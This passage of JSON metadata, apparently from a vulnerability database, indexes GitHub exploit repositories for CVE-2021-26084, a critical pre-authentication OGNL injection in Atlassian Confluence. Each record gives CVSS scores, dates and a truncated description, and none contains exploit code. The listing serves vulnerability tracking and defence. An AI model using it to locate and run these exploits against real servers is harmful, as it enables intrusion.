"baseScore": 9.8, "privilegesRequired": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.1"}, "impactScore": 5.9}, "published": "2021-09-07T01:15:16", "type": "githubexploit", "title": "Exploit for Injection in Atlassian Confluence", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-26084"], "modified": "2022-02-22T21:21:20", "id": "A4DD8B03-CBED-5284-83EA-6C21FE0EA21C", "href": "", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}, "privateArea": 1}, {"lastseen": "2023-12-03T16:05:32", "description": "# CVE-2021-26084-EXP\r\n\r\nThis code is an exploit for the CVE-2021...", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2023-07-03T07:31:29", "type": "githubexploit", "title": "Exploit for Expression Language Injection in Atlassian Confluence Server", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-26084"], "modified": "2023-09-11T11:40:35", "id": "5DB14853-1EDB-5A80-BD98-BB388CC80401", "href": "", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}, "privateArea": 1}, {"lastseen": "2022-06-10T20:47:15", "description": "# CVE-2021-2608...", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2021-09-01T12:36:52", "type": "githubexploit", "title": "Exploit for Injection in Atlassian Confluence Server", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-26084"], "modified": "2022-03-04T03:09:22", "id": "00AD1BE3-F5D6-5689-83B0-51AD7D8AFE8D", "href": "", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}, "privateArea": 1}, {"lastseen": "2022-06-10T20:52:47", "description": "# CVE-2021-26084\nConfluence OGNL injection\n\nCVE-2021-26084 is an...", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2021-09-09T06:19:13", "type": "githubexploit", "title": "Exploit for Injection in Atlassian Confluence Server", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-26084"], "modified": "2022-03-31T23:43:54", "id": "A9A21055-01FA-5B3E-84B3-E294A9641418", "href": "", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}, "privateArea": 1}, {"lastseen": "2022-06-10T20:52:06", "description": "This is a quick and dirty poc, tuned for a specifc confluence in...", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2021-09-07T12:04:09", "type": "githubexploit", "title": "Exploit for Injection in Atlassian Confluence Server", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-26084"], "modified": "2021-09-11T18:14:44", "id": "63E9680A-4D3C-5C4C-9EB3-63F2DB64F66D", "href": "", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}, "privateArea": 1}, {"lastseen": "2022-06-10T20:52:47", "description": "# CVE-2021-26084\n<p align=\"center\">\n <img src=\"https://user-ima...", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2021-09-04T13:32:42", "type": "githubexploit", "title": "Exploit for Injection in Atlassian Confluence Server", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-26084"], "modified": "2022-04-23T04:56:52", "id": "2C7E80B0-6BD9-590B-A1D6-F10D66CD7379", "href": "", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}, "privateArea": 1}, {"lastseen": "2023-12-03T16:55:53", "description": "<h1 align=\"right\">\n <br>\n <a href=\"https://github.com/smadi0x8...", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2021-09-05T09:27:55", "type": "githubexploit", "title": "Exploit for Expression Language Injection in Atlassian Confluence Server", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-26084"], "modified": "2023-03-21T07:43:04", "id": "CC614155-FD7D-599B-B89C-006B26D76F48", "href": "", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}, "privateArea": 1}, {"lastseen": "2023-12-03T16:20:19", "description": "# CVE-2021-26084-EXP\r\n\r\nThis code is an exploit for the CVE-2021...", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2023-07-03T07:31:29", "type": "githubexploit", "title": "Exploit for Expression Language Injection in Atlassian Confluence Server", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-26084"], "modified": "2023-09-11T11:40:35", "id": "69FAE88E-7F22-5ACC-B555-3441BE00C566", "href": "", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}, "privateArea": 1}, {"lastseen": "2022-07-13T23:25:08", "description": "# CVE-2021-26084\nCVE-2021-26084 - Confluence Pre-Auth RCE | O...", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2021-08-31T16:33:32", "type": "githubexploit", "title": "Exploit for Injection in Atlassian Confluence Server", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-26084"], "modified": "2022-07-13T21:41:32", "id": "28091F24-DF21-50D7-8BBB-F4C77F5B07C9", "href": "", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}, "privateArea": 1}, {"lastseen": "2022-06-10T20:47:01", "description": "# CVE-2021-26084\nCVE-2021-26084 Confluence OGNL injection\n\n![\u56fe\u7247]...", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2021-09-03T07:41:36", "type": "githubexploit", "title": "Exploit for Injection in Atlassian Confluence Server", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-26084"], "modified": "2021-12-27T09:00:16", "id": "B16D26DB-D60C-5C0C-9452-80112720B442", "href": "", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}, "privateArea": 1}, {"lastseen": "2021-12-10T15:38:38", "description": "# CVE-2021-26084\nConfluence aut...", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 9.8, "privilegesRequired": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.1"}, "impactScore": 5.9}, "published": "2021-09-08T11:01:49", "type": "githubexploit", "title": "Exploit for Injection in Atlassian Confluence", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-26084"], "modified": "2021-10-22T04:53:46", "id": "EF37F62F-1579-535A-9C3E-49B080F41CAC", "href": "", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}, "privateArea": 1}, {"lastseen": "2023-12-03T17:18:23", "description": "<h1 align=\"right\">\n <br>\n <a href=\"https://github.com/smadi0x8...", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2021-09-05T09:27:55", "type": "githubexploit", "title": "Exploit for Expression Language Injection in Atlassian Confluence Server", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-26084"], "modified": "2023-03-21T07:43:04", "id": "5C66B0C2-B7C3-5BF1-AE5C-846940E188A6", "href": "", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}, "privateArea": 1}, {"lastseen": "2023-12-03T22:03:23", "description": "# CVE-2021-26084\n# confluence\u8fdc\u7a0b\u4ee3\u7801\u6267\u884cRCE\n\n## Code By:Jun_sheng @\u6a58\u5b50...", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2021-10-25T03:07:28", "type": "githubexploit", "title": "Exploit for Expression Language Injection in Atlassian Confluence Server", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-26084"], "modified": "2022-01-02T13:22:29", "id": "BF930E9B-ED2F-52A3-87ED-2082926ED9B1", "href": "", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}, "privateArea": 1}, {"lastseen": "2023-12-03T16:19:55", "description": "# CVE-2021-26084-EXP\r\n\r\nThis code is an exploit for the CVE-2021...", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2023-07-03T07:31:29", "type": "githubexploit", "title": "Exploit for Expression Language Injection in Atlassian Confluence Server", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-26084"], "modified": "2023-09-11T11:40:35", "id": "F5B504D7-7C37-5BAB-94A5-1F1DA8384055", "href": "", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}, "privateArea": 1}, {"lastseen": "2023-12-03T21:20:05", "description": "# CVE-2021-26084\n\nCVE-2021-26084 Remote Code Execution on Conflu...", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2021-09-01T09:50:26", "type": "githubexploit", "title": "Exploit for Expression Language Injection in Atlassian Confluence Server", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-26084"], "modified": "2023-11-30T09:57:00", "id": "3B46E8A8-B6A0-5055-9270-F6B2A1F204FD", "href": "", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}, "privateArea": 1}, {"lastseen": "2023-12-03T21:58:01", "description": "# ConfluCHECK\nPython 3 script to identify CVE-2021-26084 via net...", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2021-11-23T19:45:31", "type": "githubexploit", "title": "Exploit for Expression Language Injection in Atlassian Confluence Server", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-26084"], "modified": "2021-11-24T19:02:52", "id": "6BB53677-CE73-5D62-9443-E0D71E27C1C8", "href": "", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}, "privateArea": 1}, {"lastseen": "2022-06-10T20:45:54", "description": "# CVE-2021-26084\nThis i...", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2021-09-02T07:05:23", "type": "githubexploit", "title": "Exploit for Injection in Atlassian Confluence Server", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-26084"], "modified": "2021-09-02T07:07:25", "id": "DC2A0BD8-2ABF-5885-957D-0FA3B058665C", "href": "", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}, "privateArea": 1}, {"lastseen": "2021-12-10T15:34:58", "description": "# confluence-rce-poc\nSetting up ...", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 9.8, "privilegesRequired": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.1"}, "impactScore": 5.9}, "published": "2021-09-04T14:53:38", "type": "githubexploit", "title": "Exploit for Injection in Atlassian Confluence", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-26084"], "modified": "2021-09-04T15:16:43", "id": "07C144EB-D3A5-58B3-8077-F40B0DD3A8C9", "href": "", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}, "privateArea": 1}, {"lastseen": "2021-12-10T15:29:20", "description": "# Confluence_CVE-2021-26084\nRemote Code Execution on Confluence ...", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 9.8, "privilegesRequired": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.1"}, "impactScore": 5.9}, "published": "2021-09-01T12:19:53", "type": "githubexploit", "title": "Exploit for Injection in Atlassian Confluence", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-26084"], "modified": "2021-10-26T06:18:41", "id": "4D1ED4A9-C9F8-55A0-8B96-52D4C189331C", "href": "", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}, "privateArea": 1}, {"lastseen": "2022-08-09T03:11:18", "description": "# CVE-2021-26084 - Confluence Pre-Auth RCE OGNL injection\n### U...", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2021-09-01T07:45:55", "type": "githubexploit", "title": "Exploit for Injection in Atlassian Confluence Server", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-26084"], "modified": "2022-08-08T09:54:38", "id": "47577DF3-ABF2-57F3-A35B-0496F4EE7DD9", "href": "", "cvss": 